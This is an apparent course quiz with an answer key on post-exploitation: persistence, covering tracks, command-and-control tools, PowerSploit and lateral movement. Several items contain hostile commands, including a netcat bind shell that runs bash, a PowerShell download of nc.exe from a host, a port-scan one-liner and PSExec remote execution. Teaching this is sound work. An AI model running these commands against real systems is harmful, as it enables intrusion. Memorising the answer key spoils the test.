System Security Management Quiz 8
Which of the following are post-exploitation activities to maintain persistence in a compromised system? A. Creating custom daemons and processes B. Creating and manipulating scheduled jobs and tasks C. All of these D. Creating new users
All of these
Which of the following tasks helps you cover your tracks to remain undetected? A. Deleting application logs B. Deleting temporary files C. All of these D. Suppressing syslog messages
All of these
Which of the following tools can be used for command and control? A. Twittor B. DNSCat2 C. All of these D. Socat
All of these
Which of the following PowerSploit scripts can reflectively inject a DLL into a remote process? A. Invoke-ReflectivePEInjection B. PSdll C. PSExec D. Inject-ReflectivePE
Invoke-ReflectivePEInjection
Which of the following is not true? A. Lateral movement can only be done using Nmap after compromising a system because it allows stealth attacks. B. After compromising a system, it is possible to use basic port scans to identify systems or services of interest that you can further attack in an attempt to compromise valuable information. C. Lateral movement involves scanning a network for other systems, exploiting vulnerabilities in other systems, compromising credentials, and collecting sensitive information for exfiltration. D. Lateral movement is possible if an organization does not segment its network properly.
Lateral movement can only be done using Nmap after compromising a system because it allows stealth attacks.
What is the following PowerShell command doing? 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.1.2.3",$_))"$_ is open!"} 2>$null A. Performing a reflected XSS against the 10.1.2.3 host B. Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024) C. Performing a stored XSS against the 10.1.2.3 host D. Performing a reflected XSS from the 10.1.2.3 host
Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024)
Complete the following command to launch the calculator on a compromised Windows system: ___________ \\VICTIM -d -i calc.exe A. msfexec B. meterpreter C. PlowerSploit D. PSExec
PSExec
What is another term for lateral movement? A. Reflected XSS B. Pivoting C. Reflected amplification attack D. Persistent XSS
Pivoting
Which of the following is a collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment? A. PSExec B. PowerShellPloit C. PowerSploit D. WMI and WinRM
PowerSploit
Which of the following is not a legitimate Windows tool that can be used for post-exploitation tasks? A. PowerSploit B. PowerShell C. WMI D. PSExec
PowerSploit
Which of the following can be used for lateral movement? A. RDP, Apple Remote Desktop, and VNC B. Blind SQL injection C. Directory traversal attacks D. Reflected XSS
RDP, Apple Remote Desktop, and VNC
Which of the following is typically not used as a post-exploitation tool? A. PowerSploit B. Empire C. SET D. Mimikatz
SET
Which of the following describes what the nc -lvp 2233 -e /bin/bash command does? A. The Netcat utility is used to create a reverse shell on the victim system and to execute the bash shell. B. The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell. C. The Netcat utility is used to create a reverse shell on the attacking system and to exclude the bash shell from being executed. D. The Netcat utility is used to create a reverse shell on the victim system and to exclude the bash shell from being executed.
The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell.
Consider the following example: (New-Object System.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe") What is this code doing? A. The Netcat utility is uploading files to 192.168.78.147. B. The New-ObjectSystem.Net.WebClient PowerShell script is downloading a file from 192.168.78.147. C. The New-ObjectSystem.Net.WebClient PowerSploit Linux utility is downloading a file from 192.168.78.147. D. The Netcat utility is downloading files from 192.168.78.147.
The New-ObjectSystem.Net.WebClient PowerShell script is downloading a file from 192.168.78.147.
Which of the following is not true? A. You should return any modified systems and their configuration to their original values and parameters. B. As a best practice, you should delete all files, executable binaries, scripts, and temporary files from compromised systems after the penetration testing engagement is completed. C. As a best practice, you can discuss post-engagement cleanup tasks and document them in the rules of engagement document during the pre-engagement phase. D. The client that hired an ethical hacker is liable for cleaning up the systems after a penetration testing engagement.
The client that hired an ethical hacker is liable for cleaning up the systems after a penetration testing engagement.
Which of the following tools can be used to perform many data-gathering operations and can be used by malware to perform different activities in a compromised system? A. WMIExec B. WMI C. WIM D. PSploit
WMI
Which of the following commands creates a listener on a system on port 8899? A. nl -cp 8899 B. nc -nv 8899 C. nc -lvp 8899 D. nc host 10.1.1.1 port 8899
nc -lvp 8899
Which of the following commands launches a simple HTTP web service that serves the files in the present working directory? A. msf -m SimpleHTTPServer B. msfconsole -m SimpleHTTPServer C. ngnix -m SimpleHTTPServer D. python -m SimpleHTTPServer
python -m SimpleHTTPServer